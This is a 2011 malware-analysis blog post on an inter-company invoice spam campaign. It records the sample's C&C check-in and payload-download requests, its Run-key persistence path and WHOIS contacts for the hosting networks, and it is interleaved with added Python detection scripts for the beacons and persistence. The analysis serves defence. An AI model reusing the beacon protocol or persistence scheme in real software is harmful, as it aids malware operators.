Wednesday, August 10, 2011

Inter-company Invoice spam leads to Malware

This morning we are seeing a new spam campaign in the UAB Spam Data Mine. Volumes are still low, but the count is rising steadily, and anti-virus detection so far is horrible. When I started writing this post we had seen 710 copies. It's now up to 1389 copies and counting!

count | 15-minute interval (mbox)
1 | 2011-08-10 05:45:00
6 | 2011-08-10 06:00:00
3 | 2011-08-10 06:15:00
85 | 2011-08-10 06:30:00
1 | 2011-08-10 06:45:00
3 | 2011-08-10 07:00:00
1 | 2011-08-10 07:15:00
301 | 2011-08-10 07:30:00
252 | 2011-08-10 07:45:00
260 | 2011-08-10 08:00:00
247 | 2011-08-10 08:15:00
229 | 2011-08-10 08:30:00
(12 rows)

The spam pretends to be an invoice from a random company. So far this morning we've seen spam claiming to be an invoice from:

Aleris International Corp.
AMR Corporation Corp.
Anic Corp.
Arch Coal Corp.
Beazer Homes USA Corp.
Boyd Gaming Corp.
Brookdale Senior Living Corp.
Hyland Software Corp.
KPMG Corp.
Kraft Foods Corp.
Miltek Corp.
Novellus Systems Corp.
OSN Corp.
PDC Corp.
Safeco Corporation Corp.
WLC Corp.

The Subject line can be any of:

Re: Fw: Inter-company inv. from (company)
Re: Fw: Inter-company invoice from (company)
Re: Fw: Intercompany invoice from (company)
Re: Fw: Corp. invoice from (company)

A couple of example emails follow:

Attached the inter-company inv. for the period January 2010 til December 2010.

Thanks a lot for support setting up this process.

CHERYL Flowers
Kraft Foods Corp.


Attached the inter-company inv. for the period January 2010 til December 2010.
Thanks a lot

Anic Corp.

Good day

Attached the intercompany invoice for the period January 2010 til December 2010.

Thanks a lot for supporting this process
Aleris International Corp.

The attachment may be named "Intinvoice" or "Invoice" followed by an underscore, a date, and an "invoice number", with a ".zip" extension, such as:

We've seen 1300+ copies so far in the UAB Spam Data Mine, and I have 15 in my personal email.

So far, all copies have carried the same attachment (same MD5), which is detected by only 6 of 43 engines on this VirusTotal Report.

So far the engines that do flag it only call it "Suspicious" or "Generic" ... which is our invitation to infect ourselves and figure out what it does!

When we launched the malware, we made a connection to "" on

We also talked to "" on
and to "" on

The connection to did:

GET /forum/dl/ots.php?seller=4&hash={8FA33B0C-3F04-405B-83BD-1CD82D298FF2}

which seems to be uniquely registering our machine, and giving seller #4 credit for my infection?

From we fetched a file:

GET /dump/light.exe

which dropped a file of roughly 70 KB onto our local machine.

Then we went back to and sent another get:

GET /forum/dl/getruns.php?seller=4&hash={8FA33B0C-3F04-405B-83BD-1CD82D298FF2}&ahash=5895b2509324d6a17b2b6ea09859a485

Any bets on whether that ahash is the MD5 of the file I just downloaded?

Looks like I just reported back to the C&C that I successfully downloaded and installed malware with that MD5.
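The check-in sequence above (registration via ots.php, payload fetch, then an install report via getruns.php) is easy to pull out of proxy logs once you know the URI shapes. The following is an added example, not code from the original post: it parses the two beacon URIs from constructed log lines, records the seller id and the GUID used as the victim identifier, and includes the MD5 helper you would use to test the guess that "ahash" is the hash of the payload just downloaded. The host names in the sample lines are placeholders, and the "host method path" log format is an assumption.

```python
"""Extract affiliate-downloader check-ins from proxy logs and test the ahash guess.

Added example, not code from the original post.  Only the URI shapes
(ots.php / getruns.php with seller, hash, ahash) and the payload name light.exe
come from the post; the log lines below are constructed.
"""
import hashlib
import re
from urllib.parse import parse_qs, urlsplit

# Constructed log lines, "<host> <method> <path>" (assumed format, not a real proxy's).
SAMPLE_LOG = """\
cnc.example GET /forum/dl/ots.php?seller=4&hash={8FA33B0C-3F04-405B-83BD-1CD82D298FF2}
payload.example GET /dump/light.exe
cnc.example GET /forum/dl/getruns.php?seller=4&hash={8FA33B0C-3F04-405B-83BD-1CD82D298FF2}&ahash=5895b2509324d6a17b2b6ea09859a485
"""

CHECKIN_SCRIPTS = ("ots.php", "getruns.php")
GUID_RE = re.compile(r"^\{[0-9A-Fa-f]{8}(-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}$")
MD5_RE = re.compile(r"^[0-9a-fA-F]{32}$")


def parse_beacons(log_text):
    """Return one dict per line that hits the downloader's check-in scripts."""
    beacons = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        host, _method, path = line.split(" ", 2)
        parts = urlsplit(path)
        script = parts.path.rsplit("/", 1)[-1]
        if script not in CHECKIN_SCRIPTS:
            continue
        # parse_qs keeps lists; each parameter appears once here, so take the first value.
        q = {k: v[0] for k, v in parse_qs(parts.query).items()}
        beacons.append({
            "host": host,
            "script": script,
            "seller": q.get("seller"),
            "hash": q.get("hash"),
            "ahash": q.get("ahash"),
            # Registration uses a brace-wrapped GUID as the per-victim identifier.
            "hash_is_guid": bool(GUID_RE.match(q.get("hash", ""))),
            # The install report carries a 32-hex value that looks like an MD5.
            "ahash_is_md5": bool(MD5_RE.match(q.get("ahash", ""))),
        })
    return beacons


def md5_hex(payload: bytes) -> str:
    """MD5 of a downloaded payload, lower-case hex (the form ahash uses)."""
    return hashlib.md5(payload).hexdigest()


def ahash_matches(ahash: str, payload: bytes) -> bool:
    """Test the guess that ahash is the MD5 of the payload the victim just fetched."""
    return md5_hex(payload) == ahash.lower()


def install_reports(beacons):
    """Pair each getruns.php report with the ots.php registration of the same victim GUID."""
    registered = {b["hash"]: b for b in beacons if b["script"] == "ots.php"}
    return [(registered.get(b["hash"]), b) for b in beacons if b["script"] == "getruns.php"]


if __name__ == "__main__":
    for reg, rep in install_reports(parse_beacons(SAMPLE_LOG)):
        print("victim", rep["hash"], "seller", rep["seller"],
              "registered first:", reg is not None, "ahash:", rep["ahash"])
```

To check the MD5 guess against a real capture, feed the bytes of the file fetched as light.exe to `ahash_matches` together with the ahash value from the getruns.php request; a mismatch means the parameter identifies something other than the plain MD5 of that download.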

At this point I checked the registry and found a new Run entry that will execute on the next restart. I'm supposed to run:

C:\Documents and Settings\Administrator\Application Data\3B1F8DC4\3B1F8DC4.EXE

Odd, I don't recall having a file named that?

Actually, we confirmed that this is the file that was downloaded as "light.exe" above. VirusTotal shows only 4 of 43 engines detecting this file as well. See VirusTotal Report.

Unfortunately, it disproves my MD5 theory. This is NOT the "ahash" value. This file's MD5 is f58d5cbb564069eca8806d4e48d7a714.
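The persistence shape seen here (an EXE dropped under the user's Application Data folder, in a directory with a random-looking 8-hex-digit name, with the EXE named after its directory, and wired in through the Run key) is a pattern worth flagging across a fleet. The following is an added example, not code from the original post: it takes a dump in the shape of `reg query` output for a Run key (constructed here, with one entry modelled on the path from the post) and scores each entry against that pattern.

```python
"""Flag Run-key entries shaped like the one this sample installed.

Added example, not code from the original post.  The path pattern
(\\Application Data\\3B1F8DC4\\3B1F8DC4.EXE) comes from the post; the dump
below is constructed to resemble `reg query HKCU\\...\\Run` output.
"""
import re

RUN_KEY_DUMP = """\
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
    ctfmon.exe    REG_SZ    C:\\WINDOWS\\system32\\ctfmon.exe
    3B1F8DC4      REG_SZ    C:\\Documents and Settings\\Administrator\\Application Data\\3B1F8DC4\\3B1F8DC4.EXE
    Updater       REG_SZ    "C:\\Program Files\\Vendor\\updater.exe" /background
"""

ENTRY_RE = re.compile(r"^\s+(\S+)\s+REG_(?:EXPAND_)?SZ\s+(.*)$")
# Last two path components under a per-user Application Data folder.
APPDATA_RE = re.compile(r"\\Application Data\\([^\\]+)\\([^\\]+)$", re.IGNORECASE)
HEXNAME_RE = re.compile(r"^[0-9A-F]{8}$", re.IGNORECASE)


def parse_run_entries(dump):
    """Return (value name, value data) pairs from a reg-query style dump."""
    entries = []
    for line in dump.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            entries.append((m.group(1), m.group(2).strip()))
    return entries


def executable_path(value):
    """Strip quoting and arguments to get the executable's path."""
    if value.startswith('"'):
        return value[1:value.find('"', 1)]
    # Unquoted paths may contain spaces; cut after the first .exe token.
    m = re.match(r"(.*?\.exe)(?:\s|$)", value, re.IGNORECASE)
    return m.group(1) if m else value


def score_entry(name, value):
    """Reasons an entry matches the dropper's persistence pattern (empty = benign-looking)."""
    reasons = []
    m = APPDATA_RE.search(executable_path(value))
    if not m:
        return reasons
    folder, filename = m.groups()
    reasons.append("executable lives in a per-user Application Data folder")
    if HEXNAME_RE.match(folder):
        reasons.append("folder name is 8 hex digits")
    stem = filename.rsplit(".", 1)[0]
    if stem.lower() == folder.lower():
        reasons.append("executable is named after its folder")
    if name.lower() == folder.lower():
        reasons.append("Run value name matches the folder")
    return reasons


def suspicious_entries(dump):
    """Map value name -> reasons for every entry that triggers at least one reason."""
    flagged = {}
    for name, value in parse_run_entries(dump):
        reasons = score_entry(name, value)
        if reasons:
            flagged[name] = reasons
    return flagged


if __name__ == "__main__":
    for name, reasons in suspicious_entries(RUN_KEY_DUMP).items():
        print(name, "->", "; ".join(reasons))
```

On a live host the same scoring applies to entries read from HKCU and HKLM Run and RunOnce keys; the Application Data check alone is a weak signal (some legitimate updaters live there), so treat the folder-name and self-named-EXE reasons as the ones that push an entry toward triage.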

Launching the second file caused the machine to open an SSL tunnel to and then sit idle.

You may recognize that as the IP address for "" earlier, but it didn't make a connection by name. It went straight for the IP address. If that IP sounds familiar, it's probably because there have been many other malware campaigns tied to the network "Azerbaijan Baku Sol Ltd", but I'm sure that's just because it's a very large network. is currently hosting three live Zeus C&C servers. Surely a coincidence.

I'll email the owner and get those taken down right away! (smirk)
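The detail that the second stage opened its SSL tunnel straight to an IP address, with no name lookup, is itself a usable detection: on a monitored network, an outbound TLS connection to an address that no recent DNS answer resolved to stands out. The following is an added example, not code from the original post: it correlates constructed DNS-answer records with constructed connection records and reports TLS connections whose destination was not resolved within a time window. The addresses are documentation ranges and the record format is an assumption.

```python
"""Flag outbound TLS connections to IPs with no preceding DNS resolution.

Added example, not code from the original post.  Records below are constructed;
timestamps are seconds, addresses are RFC 5737 documentation ranges.
"""
from collections import defaultdict

# (timestamp, queried name, answered IP) - constructed DNS answers seen on the wire.
DNS_ANSWERS = [
    (10, "c2.example", "192.0.2.44"),          # resolved long ago, by the first stage
    (990, "www.example.com", "203.0.113.10"),
    (991, "cdn.example.net", "198.51.100.7"),
]

# (timestamp, source IP, destination IP, destination port) - constructed connections.
CONNECTIONS = [
    (992, "10.0.0.5", "203.0.113.10", 443),
    (993, "10.0.0.5", "198.51.100.7", 443),
    (1000, "10.0.0.5", "192.0.2.44", 443),    # second stage: straight to the IP
    (1001, "10.0.0.5", "192.0.2.44", 80),     # not TLS, ignored by this check
]

TLS_PORTS = {443}


def direct_to_ip_tls(connections, dns_answers, window=300):
    """Return (ts, src, dst, last_name) for TLS connections whose destination
    IP was not returned by any DNS answer in the preceding `window` seconds.

    last_name is the most recent name that ever resolved to the IP (or None),
    which is useful context when the same address was earlier reached by name.
    """
    resolved = defaultdict(list)  # ip -> [(ts, name), ...]
    for ts, name, ip in dns_answers:
        resolved[ip].append((ts, name))

    hits = []
    for ts, src, dst, port in connections:
        if port not in TLS_PORTS:
            continue
        recent = [t for t, _ in resolved[dst] if ts - window <= t <= ts]
        if recent:
            continue
        earlier = [(t, n) for t, n in resolved[dst] if t <= ts]
        last_name = max(earlier)[1] if earlier else None
        hits.append((ts, src, dst, last_name))
    return hits


if __name__ == "__main__":
    for ts, src, dst, last_name in direct_to_ip_tls(CONNECTIONS, DNS_ANSWERS):
        print(f"{ts}: {src} -> {dst}:443 without DNS (last known name: {last_name})")
```

The window matters: a hard-coded C&C address will never show a lookup, while a legitimate client reconnecting within a long TTL may simply be reusing a cached answer, so set the window to at least the largest TTL you expect and tune from there.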


person: Vugar Kouliyev
address: 44, J.Jabbarli str., Baku, Azerbaijan
mnt-by: MNT-SOL
phone: +994124971234
nic-hdl: VK1161-RIPE
source: RIPE # Filtered

descr: SOL ISP
origin: AS43637
mnt-by: MNT-SOL
source: RIPE # Filtered

descr: SOL ISP
origin: AS43637
mnt-by: MNT-SOL
source: RIPE # Filtered

---------------- on also has a sordid history.

That IP address, in Hungary, has been associated with at least two active SpyEye domains: and

I suppose we'll have to ask Mr. Zsolt nicely if he would remove those domains.

person: Zemancsik Zsolt
address: Victor Hugo u. 18-22.
address: 1132 Budapest
address: Hungary
phone: +36 203609059
nic-hdl: DARW-RIPE
mnt-by: DARW-MNT
source: RIPE # Filtered

descr: Originated from 23VNet Network
origin: AS30836
mnt-by: NET23-MNT
source: RIPE # Filtered

======== is on servers from, a customer of Volia DC

person: Volia DC Admin contact
address: Ukraine, Kiev, Kikvidze st. 1/2
phone: +38 044 2852716
nic-hdl: VDCA-RIPE
mnt-by: VOLIA-DC-MNT
source: RIPE # Filtered

descr: Volia more specific route
origin: AS25229
mnt-by: VOLIA-MNT
mnt-lower: VOLIA-MNT
source: RIPE # Filtered
